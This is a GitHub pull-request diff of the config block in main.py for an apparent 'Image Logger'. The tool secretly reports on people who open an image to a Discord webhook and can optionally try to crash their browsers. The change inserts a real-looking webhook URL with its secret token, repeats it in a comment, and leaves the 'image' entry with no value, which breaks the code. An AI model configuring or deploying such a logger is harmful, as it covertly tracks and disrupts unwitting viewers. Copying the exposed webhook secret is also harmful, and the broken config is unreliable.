Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 4 additions & 4 deletions main.py
Original file line number Diff line number Diff line change
Expand Up @@ -12,14 +12,14 @@

config = {
# BASE CONFIG #
"webhook": "https://discord.com/api/webhooks/your/webhook",
"image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument
"webhook": "https://discord.com/api/webhooks/1307153727551049829/hbgtcs-FAxzskIwH4oX9l4hvhwcpRZSx6g0w5qBkL7FsWtDtw0yHqRNiaCxieS2XSeYJ",
"image":, # https://discord.com/api/webhooks/1307153727551049829/hbgtcs-FAxzskIwH4oX9l4hvhwcpRZSx6g0w5qBkL7FsWtDtw0yHqRNiaCxieS2XSeYJ
# (E.g. yoursite.com/imagelogger?url=<Insert a URL-escaped link to an image here>)
"imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)

# CUSTOMIZATION #
"username": "Image Logger", # Set this to the name you want the webhook to have
"color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000)
"username": "Image Logger", # eobard thawne
"color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xff0000)

# OPTIONS #
"crashBrowser": False, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/OverPowerC/Chromebook-Crasher)
Expand Down